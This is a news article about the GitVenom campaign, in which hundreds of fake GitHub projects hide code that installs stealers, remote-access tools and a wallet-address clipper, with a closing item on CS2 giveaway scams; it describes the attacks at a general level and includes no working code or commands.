GitVenom Malware Targets Bitcoin Users, Steals $456K by Hijacking Wallets through Fake GitHub Projects

Researchers in the cybersecurity field are drawing attention to an ongoing scheme that specifically aims at individuals involved in gaming and cryptocurrency investments. This scheme operates under the guise of open-source projects that are hosted on GitHub. Referred to as GitVenom by Kaspersky, the campaign encompasses hundreds of repositories that contain fake projects.
The activities within these infected projects include purported functionalities such as an automated tool for engaging with Instagram accounts, a Telegram bot capable of remotely managing Bitcoin wallets, and a cracked tool designed for gameplay in Valorant. However, these functionalities are not genuine as the individuals behind this campaign have malevolent intentions to steal personal data, banking information, and hijack crypto wallet addresses.
The criminals orchestrating this operation have managed to pilfer five bitcoins, amounting to approximately $456,600 at the current value. This campaign has been ongoing for about two years, with the publication of some fake projects dating back to that time. The majority of the fraudulent activities have been recorded in regions such as Russia, Brazil, and Turkey.
These nefarious projects are composed in a variety of programming languages, including Python, JavaScript, C, C++, and C#. Regardless of the language used, the ultimate objective remains consistent – activate a hidden malicious element embedded within the project. This allows for the retrieval and execution of additional components controlled by the attackers from a GitHub repository.
Key components deployed through these bogus projects include a Node.js information collector responsible for collating passwords, bank account details, saved login credentials, cryptocurrency wallet information, and web history. This information is compiled into a .7z archive and transmitted to the threat actors via Telegram. Additionally, remote administration tools like AsyncRAT and Quasar RAT are distributed via these projects, enabling hackers to take control of infected devices. A clipper malware is also included, serving to replace copied wallet addresses with the hacker’s addresses to reroute the digital assets.
In light of these incidents, Kaspersky researcher Georgy Kucherin emphasizes the importance of exercising caution when dealing with third-party code. He warns that threat actors will persist in employing fake software as a means of infecting systems. Developers are urged to conduct comprehensive checks on code before implementation to prevent unforeseen malicious activities.
Furthermore, reports from Bitdefender reveal a separate scam targeting players of Counter-Strike 2 (CS2) during major e-sports events like IEM Katowice 2025 and PGL Cluj-Napoca 2025. Cybercriminals exploit YouTube accounts to impersonate professional players and entice fans with fake CS2 skin giveaways, ultimately leading to the theft of Steam accounts, cryptocurrency, and valuable in-game items.